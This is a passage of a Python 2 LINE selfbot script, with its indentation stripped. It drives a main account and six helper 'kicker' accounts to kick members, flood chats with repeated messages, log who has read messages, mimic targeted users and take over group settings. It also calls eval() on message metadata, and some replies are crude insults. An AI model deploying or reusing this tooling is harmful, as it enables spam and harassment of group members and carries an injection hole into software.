wait["lang"] = "TW"
cl.sendText(msg.to,"I changed the language to engglis👈")
else:
wait["lang"] = "JP"
cl.sendText(msg.to,"I changed the language to indonesia👈")
elif "Message set" in msg.text:
c = msg.text.replace("Message set","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Is a string that can not be changed👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"This has been changed👈\n\n" + c)
elif "Come Set:" in msg.text:
c = msg.text.replace("Come Set:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah👈\n\n" + c)
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:👈\n\n" + str(wait["comment"]))
elif msg.text.lower() == 'me':
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif msg.text in ["ผู้สร้าง"]:
msg.contentType = 13
msg.contentMetadata = {"mid":"u7a4febc4c650fc7679eadf4245c2a5ad"}
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
cl.sendMessage(msg)
elif "midเรา" == msg.text:
cl.sendText(msg.to,mid)
elif "1mid" == msg.text:
ki.sendText(msg.to,kimid)
elif "2mid" == msg.text:
ki2.sendText(msg.to,ki2mid)
elif "3mid" == msg.text:
ki3.sendText(msg.to,ki3mid)
elif "4mid" == msg.text:
ki4.sendText(msg.to,ki4mid)
elif "5mid" == msg.text:
ki5.sendText(msg.to,ki5mid)
elif "6mid" == msg.text:
ki6.sendText(msg.to,ki6mid)
elif "คลิ้กmid" == msg.text:
ki.sendText(msg.to,kimid)
ki2.sendText(msg.to,ki2mid)
ki3.sendText(msg.to,ki3mid)
ki4.sendText(msg.to,ki4mid)
ki5.sendText(msg.to,ki5mid)
ki6.sendText(msg.to,ki6mid)
elif "ชื่อ: " in msg.text:
string = msg.text.replace("ชื่อ: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki6.getProfile()
profile.displayName = string
ki6.updateProfile(profile)
elif msg.text.lower() == 'เช็คออน์':
eltime = time.time() - mulai
van = "༺ πနးຫຮี่のีধ์͜͡ ༻\nเวลาการทำงานของบอท \n"+waktu(eltime)
cl.sendText(msg.to,van)
elif "ตัส: " in msg.text:
string = msg.text.replace("ตัส: ","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki5.getProfile()
profile.statusMessage = string
ki5.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki6.getProfile()
profile.statusMessage = string
ki6.updateProfile(profile)
elif "ชื่อเรา: " in msg.text:
string = msg.text.replace("ชื่อเรา: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉 " + string + "👈")
elif "1ชื่อ: " in msg.text:
string = msg.text.replace("1ชื่อ: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"༺ πနးຫຮี่のีধ์͜͡ ༻\n" + string + "👈")
elif "2ชื่อ: " in msg.text:
string = msg.text.replace("2ชื่อ: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"༺ πနးຫຮี่のีধ์͜͡ ༻\n" + string + "⇇⇇👈")
elif "3ชื่อ: " in msg.text:
string = msg.text.replace("3ชื่อ: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"༺ πနးຫຮี่のีধ์͜͡ ༻\n" + string + "⇇⇇👈")
elif "4ชื่อ: " in msg.text:
string = msg.text.replace("4ชื่อ: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"༺ πနးຫຮี่のีধ์͜͡ ༻\n" + string + "⇇⇇👈")
elif "ตัสเรา: " in msg.text:
string = msg.text.replace("ตัสเรา: ","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio👉" + string + "⇇⇇👈")
elif "5ตัส: " in msg.text:
string = msg.text.replace("5ตัส: ","")
if len(string.decode('utf-8')) <= 500:
profile = ki5.getProfile()
profile.statusMessage = string
ki5.updateProfile(profile)
ki5.sendText(msg.to,"Update Bio👉" + string + "⇇⇇👈")
elif "6ตัส: " in msg.text:
string = msg.text.replace("6ตัส: ","")
if len(string.decode('utf-8')) <= 500:
profile = ki6.getProfile()
profile.statusMessage = string
ki6.updateProfile(profile)
ki6.sendText(msg.to,"Update Bio👉" + string + "⇇⇇👈")
elif "บอท" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki6mid}
cl.sendMessage(msg)
elif "1" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
elif "2" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
elif "3" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
elif "4" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
elif "5" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
elif "6" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki6mid}
ki6.sendMessage(msg)
elif "Mid: " in msg.text:
mmid = msg.text.replace("Mid: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif "kick " in msg.text:
midd = msg.text.replace("kick ","")
cl.kickoutFromGroup(msg.to,[midd])
elif "เชิญ:" in msg.text:
midd = msg.text.replace("เชิญ:","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif msg.text in [".me","me","Me"]:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["กำ","กำกำ","กำกำกำ"]:
cl.sendText(msg.to," กำควยหรือ \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["55","555","5555"]:
cl.sendText(msg.to," ตลกมากหรอไอสัส...By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["Sp","Speed","speed"]:
start = time.time()
cl.sendText(msg.to, "By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
ki6.sendText(msg.to, "%sseconds" % (elapsed_time))
elif msg.text.lower() == 'respon':
profile = ki.getProfile()
text = profile.displayName + " ༺ πနးຫຮี่のีধ์͜͡ ༻"
ki.sendText(msg.to, text)
profile = ki2.getProfile()
text = profile.displayName + " ༺ πနးຫຮี่のีধ์͜͡ ༻"
ki2.sendText(msg.to, text)
profile = ki3.getProfile()
text = profile.displayName + " ༺ πနးຫຮี่のีধ์͜͡ ༻"
ki3.sendText(msg.to, text)
profile = ki4.getProfile()
text = profile.displayName + " ༺ πနးຫຮี่のีধ์͜͡ ༻"
ki4.sendText(msg.to, text)
profile = ki5.getProfile()
text = profile.displayName + " ༺ πနးຫຮี่のีধ์͜͡ ༻"
ki5.sendText(msg.to, text)
profile = ki6.getProfile()
text = profile.displayName + " ༺ πနးຫຮี่のีধ์͜͡ ༻"
ki6.sendText(msg.to, text)
elif "Bot?" in msg.text:
ki.sendText(msg.to,"Bot 💀1💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki2.sendText(msg.to,"Bot 💀2💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki3.sendText(msg.to,"Bot 💀3💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki4.sendText(msg.to,"Bot 💀4💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki5.sendText(msg.to,"Bot 💀5💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki6.sendText(msg.to,"Bot 💀6💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki.sendText(msg.to,"Bot 💀1💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki2.sendText(msg.to,"Bot 💀2💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki3.sendText(msg.to,"Bot 💀3💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki4.sendText(msg.to,"Bot 💀4💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki5.sendText(msg.to,"Bot 💀5💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki6.sendText(msg.to,"Bot 💀6💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki.sendText(msg.to,"Bot 💀1💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki2.sendText(msg.to,"Bot 💀2💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki3.sendText(msg.to,"Bot 💀3💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki4.sendText(msg.to,"Bot 💀4💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki5.sendText(msg.to,"Bot 💀5💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki6.sendText(msg.to,"Bot 💀6💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif "T say " in msg.text:
bctxt = msg.text.replace("T say ","")
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki6.sendText(msg.to,(bctxt))
elif msg.text.lower() == 'บอทเข้า':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
elif msg.text.lower() == 'เข้า3':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
elif msg.text.lower() == 'เข้า6':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
elif "1เข้า" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
elif "2เข้า" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
elif "3เข้า" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
elif "4เข้า" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki4.updateGroup(G)
print "kicker ok"
elif "5เข้า" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
elif "6เข้า" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki6.updateGroup(G)
print "kicker ok"
elif msg.text.lower() == 'บอทออก':
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"Bye Bye " + str(ginfo.name) + "By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki6.leaveGroup(msg.to)
except:
pass
elif msg.text.lower() == "ออก":
# All kicker bots are assumed to share the same groups, so one list is enough.
gid = ki.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
ki3.leaveGroup(i)
ki4.leaveGroup(i)
ki5.leaveGroup(i)
ki6.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif "1ออก" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif "2ออก" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
elif "3ออก" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
elif "4ออก" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
elif "5ออก" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
elif "6ออก" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki6.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Welcome","wc","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
elif "Sayang say " in msg.text:
bctxt = msg.text.replace("Sayang say ","")
ki12.sendText(msg.to,(bctxt))
elif "Say " in msg.text:
bctxt = msg.text.replace("Say ","")
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki6.sendText(msg.to,(bctxt))
elif msg.text.lower() == 'ping':
ki.sendText(msg.to,"Ping ")
ki2.sendText(msg.to,"Ping ")
ki3.sendText(msg.to,"Ping ")
ki4.sendText(msg.to,"Ping ")
ki5.sendText(msg.to,"Ping ")
ki6.sendText(msg.to,"Ping ")
elif msg.text in ["เปิดอ่าน","R on","ตั้งเวลา"]:
cl.sendText(msg.to,"lurk on")
elif msg.text in ["ปิดอ่าน","R off"]:
cl.sendText(msg.to,"lurk off")
elif msg.text in ["อ่าน","Ry"]:
cl.sendText(msg.to,"lurkers")
elif msg.text in ["Ry20"]:
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
elif "lurk on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"เปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "เปิดการอ่านอัตโนมัต\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "lurk off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"ปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "ปิดการอ่านอัตโนมัต\n" + datetime.now().strftime('%H:%M:%S'))
elif "lurkers" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "Lurkers:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "Lurking has not been set.")
elif ("พูดตาม " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("ลบพูดตาม " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist","เช็คพูดตาม"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "• "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "siri " in msg.text.lower():
query = msg.text.lower().replace("siri ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri:" in msg.text.lower():
query = msg.text.lower().replace("siri:","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri-en " in msg.text.lower():
query = msg.text.lower().replace("siri-en ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'en', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "พูด " in msg.text.lower():
query = msg.text.lower().replace("พูด ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif msg.text in ["1ของขวัญ","t1gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text in ["ของขวัญ","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["2ของขวัญ","t2gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["3ของขวัญ","t3gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["4ของขวัญ","t4gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif ("ชื่อกลุ่ม: " in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("ชื่อกลุ่ม: ","")
ki.updateGroup(group)
else:
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok👈")
elif ("Gn " in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("Gn ","")
cl.updateGroup(group)
else:
cl.sendText(msg.to,"ได้ทำการเปลี่ยนชื่อเรียบร้อยแล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif "ลิ้งค์+" in msg.text:
if msg.toType == 2:
gid = msg.text.replace("gurl+","")
gurl = cl.reissueGroupTicket(gid)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
cl.sendText(msg.to,"ลิ้งค์ของกลุ่ม By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif "2ลิ้งค์กลุ่ม" in msg.text:
if msg.toType == 1:
tid = msg.text.replace("gurl","")
turl = ki.getUserTicket(tid)
ki.sendText(msg.to,"line://ti/p" + turl)
else:
ki.sendText(msg.to,"error")
elif "1ลิ้งค์กลุ่ม" in msg.text:
if msg.toType == 2:
gid = msg.text.replace("gurl","")
gurl = cl.reissueGroupTicket(gid)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
cl.sendText(msg.to,"ลิ้งค์กลุ่มปิดอยู่ \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text.lower() == 'ชื่อเวลาเปิด':
if wait["clock"] == True:
cl.sendText(msg.to,"Sudah On")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"เแิดชื่อ+เวลาเรียบร้อย by. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text.lower() == 'ชื่อเวลาปิด':
if wait["clock"] == False:
cl.sendText(msg.to,"ปิดเวลาในชื่อ \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["clock"] = False
cl.sendText(msg.to,"ปิดอยู่")
elif "ตั้งเวลา:" in msg.text:
n = msg.text.replace("ตั้งเวลา:","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻\n\n" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui👈")
else:
cl.sendText(msg.to,"Silahkan Aktifkan Nama")
elif msg.text in ["url","Url"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["lลบรัน"]:
gid = cl.getGroupIdsInvited()
for i in gid:
